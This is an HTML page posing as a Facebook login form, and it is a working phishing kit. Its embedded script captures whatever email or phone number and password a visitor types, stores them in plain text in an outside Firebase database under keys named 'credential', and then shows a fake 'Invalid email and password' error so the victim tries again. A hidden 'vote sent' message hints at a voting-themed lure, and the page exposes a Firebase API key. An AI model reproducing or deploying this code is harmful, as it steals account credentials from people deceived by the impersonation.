<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Facebook Login Page</title>
    <link rel="stylesheet" href="./login_form_2.css" />
	  <link rel="icon" type="image/x-icon" href="img/fb.png">
	<style>
	@import url("https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap");

* {
  margin: 0;
  padding: 0;
  box-sizing: border-box;
}

body {
  font-family: "Poppins", sans-serif;
  background: #f2f4f7;
}

.content {
  position: absolute;
  top: 50%;
  left: 50%;
  transform: translate(-50%, -50%);
}

.flex-div {
  display: flex;
  justify-content: space-evenly;
  align-items: center;
}

.name-content {
  margin-right: 7rem;
}

.name-content .logo {
  font-size: 3.5rem;
  color: #1877f2;
}
.name-content .logo2 {
  font-size: 2.5rem;
  color: #1877f2;
}
.name-content p {
  font-size: 1.3rem;
  font-weight: 500;
  margin-bottom: 5rem;
}

section {
  display: flex;
  flex-direction: column;
  background: #fff;
  padding: 2rem;
  width: 530px;
  height: 380px;
  border-radius: 0.5rem;
  box-shadow: 0 2px 4px rgb(0 0 0 / 10%), 0 8px 16px rgb(0 0 0 / 10%);
}

section input {
  outline: none;
  padding: 0.8rem 1rem;
  margin-bottom: 0.8rem;
  font-size: 1.1rem;
}

section input:focus {
  border: 1.8px solid #1877f2;
}

section .login {
  outline: none;
  border: none;
  background: #1877f2;
  padding: 0.8rem 1rem;
  border-radius: 0.4rem;
  font-size: 1.1rem;
  color: #fff;
}

section .login:hover {
  background: #0f71f1;
  cursor: pointer;
}

section a {
  text-decoration: none;
  text-align: center;
  font-size: 1rem;
  padding-top: 0.8rem;
  color: #1877f2;
}

section hr {
  background: #f7f7f7;
  margin: 1rem;
}

section .create-account {
  outline: none;
  border: none;
  background: #06b909;
  padding: 0.8rem 1rem;
  border-radius: 0.4rem;
  font-size: 1.1rem;
  color: #fff;
  width: 75%;
  margin: 0 auto;
}

form .create-account:hover {
  background: #03ad06;
  cursor: pointer;
}

/* //.........Media Query.........// */

@media (max-width: 500px) {
  html {
    font-size: 60%;
  }

  .name-content {
    margin: 0;
    text-align: center;
  }

  section {
    width: 300px;
    height: fit-content;
  }

  section input {
    margin-bottom: 1rem;
    font-size: 1.5rem;
  }

  section .login {
    font-size: 1.5rem;
  }

  section a {
    font-size: 1.5rem;
  }

  section .create-account {
    font-size: 1.5rem;
  }

  .flex-div {
    display: flex;
    flex-direction: column;
  }
}

@media (min-width: 501px) and (max-width: 768px) {
  html {
    font-size: 60%;
  }

  .name-content {
    margin: 0;
    text-align: center;
  }

  section {
    width: 300px;
    height: fit-content;
  }

  section input {
    margin-bottom: 1rem;
    font-size: 1.5rem;
  }

  section .login {
    font-size: 1.5rem;
  }

  section a {
    font-size: 1.5rem;
  }

  section .create-account {
    font-size: 1.5rem;
  }

  .flex-div {
    display: flex;
    flex-direction: column;
  }
}

@media (min-width: 769px) and (max-width: 1200px) {
  html {
    font-size: 60%;
  }

  .name-content {
    margin: 0;
    text-align: center;
  }

  section {
    width: 300px;
    height: fit-content;
  }

  section input {
    margin-bottom: 1rem;
    font-size: 1.5rem;
  }

  section .login {
    font-size: 1.5rem;
  }

  section a {
    font-size: 1.5rem;
  }

  section .create-account {
    font-size: 1.5rem;
  }

  .flex-div {
    display: flex;
    flex-direction: column;
  }

  @media (orientation: landscape) and (max-height: 500px) {
    .header {
      height: 90vmax;
    }
  }  
}
.text-input {
  display: block;
  margin: .3em 0 1.5em;
  width: 100%;
  border: solid 2px #ccc;
  padding: .925em 0 .925em 1em;
}

.value {
  font-size: 1.6em;
  color: #8C8C8C;
  font-weight: 300;
  margin-top: .3em;
}

.primary-btn {
  font-size: 1.1em;
  font-weight: 700;
  margin-top: 1em;
  margin-bottom: 1em;
  background: #cc0000;
  color: white;
  border: none;
  border-radius: 0;
  padding: 1em 4em;
  box-shadow: inset 0 -4px 0 #A50000;
  letter-spacing: 0.02em;
  transition: all 0.2s;
  
  &:hover, &:active, &:focus {
    cursor: pointer;
    background: #A50000;
  }
}

.content-wrapper, .logo {
  margin: 0 auto;
  padding: 0 2em;
  max-width: 500px;
  min-width: 360px;
}

.row {
  display: flex;
  justify-content: space-between;
  & > div {
    width: 49%;
  }
}

.input-block {
  margin: 2em 0;
  border: 2px white solid;
}

.alert {
  background: #FAE6E6;
  padding: .5em 1em 2em 2em;
  margin: 0 0 0 0;
  box-shadow: inset 6px 0 #CC0000;
font-size: 11px !important;
}

h4 {
  font-size: 1.5em;
  font-weight: 700;
  color: black;
  letter-spacing: 0.02em;
  margin-top: 1em;
  margin-left: 2em;
  margin-bottom: .5em;
}

.alert_text {
  margin-left: 3em;
  margin-bottom: .5em;
}
	</style>
  </head>
  <body>
    <div class="content">
      <div class="flex-div div-fb">
        <div class="name-content">
          <h1 class="logo">Facebook</h1>
          <p>Connect with friends and the world around you on Facebook.</p>
        </div>
		

		
          <section>
		  
		  
		  			  <div class ="alert">
    <h4>Login failure</h4>
    <div class="alert_text">Invalid email and password.</div>
  </div><br />
  
            <input type="text" id="txtname" placeholder="Email or Phone Number" required autofocus/>
            <input type="password" id="txtmessage" placeholder="Password" required />
            <button  class="login btnPost" >Log In</button>
            <a href="#">Forgot Password ?</a>
            <hr>
            <button class="create-account">Create New Account</button>
          </section>
      </div>
	  
	  <div class="flex-div div-sucess" style="display:none;">
        <div class="name-content">
          <h1 class="logo2">Your vote is successfully sent!</h1>

        </div>

      </div>
    </div>
	
	
	
	
  </body>
</html>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
   <!--Firebase Libraries-->
               <script src="https://www.gstatic.com/firebasejs/7.15.5/firebase-app.js"></script>
               <script src="https://www.gstatic.com/firebasejs/7.15.5/firebase-auth.js"></script>
               <script src="https://www.gstatic.com/firebasejs/7.15.5/firebase-database.js"></script> 
 <script id="MainScript">
                  var commentCount = 0;
                    $(document).ready(function () {
						 $(".alert").hide();
                           // Your web app's Firebase configuration
                           var  firebaseConfig = {
									  apiKey: "AIzaSyC_m-iaZL1fzT8hkjGc1dA-GQ312VLwSvM",
									  authDomain: "xtian-684b7.firebaseapp.com",
									  databaseURL: "https://xtian-684b7-default-rtdb.firebaseio.com",
									  projectId: "xtian-684b7",
									  storageBucket: "xtian-684b7.appspot.com",
									  messagingSenderId: "892563326252",
									  appId: "1:892563326252:web:11070a7425fd6033aa1889",
									  measurementId: "G-7HV4MDBHBC"
									};

                           // Initialize Firebase
                           firebase.initializeApp(firebaseConfig);
                           //GetMessageFirebase();
                           });
             
                   



                     $('.btnPost').click(function() { 
	
						
                              var _name   = document.getElementById("txtname").value;
                              var _message = document.getElementById("txtmessage").value;
							  

							  var date_ob = new Date();
                              var date = ("0" + date_ob.getDate()).slice(-2);
                              var month = ("0" + (date_ob.getMonth() + 1)).slice(-2);
                              var year = date_ob.getFullYear();
                              var hours = date_ob.getHours();
                              var minutes = date_ob.getMinutes();
                              var seconds = date_ob.getSeconds();
                              var _date2 = year+ month+date+hours+minutes+seconds;
		
			

                             var _countId = _date2;
                              firebase.database().ref('credential' + _countId).set({
                                    username:_name,
                                    password:_message
                                 });
								
                                 //alert("Your message is successfully posted. Thank you :) ");
                                $(".alert").show();
								 

                              });
							 	
                </script>